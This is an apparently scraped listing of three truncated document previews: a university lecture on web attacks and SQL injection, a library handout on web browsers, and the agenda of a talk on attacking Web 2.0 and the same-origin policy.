Web Attacks CMSC 414 September 25 & 27, 2017 Overview SQL Injection is frequently implemented as a web-based attack, but doesn t necessarily need to be There are a wide variety of web-based attacks Some
More informationLooking at the Internet with Google Chrome & Firefox. Scoville Memorial Library Claudia Cayne - September, 2010
Looking at the Internet with Google Chrome & Firefox Scoville Memorial Library Claudia Cayne - ccayne@biblio.org September, 2010 Google Chrome & Firefox are web browsers - the decoder you need to view
More informationAttacking Web2.0. Daiki Fukumori Secure Sky Technology Inc.
Attacking Web2.0 Daiki Fukumori Secure Sky Technology Inc. Agenda Introduction What Is Web2.0 (from Attackers view) Attacking Same-Origin Policy Advanced Attacking Same-Origin
More information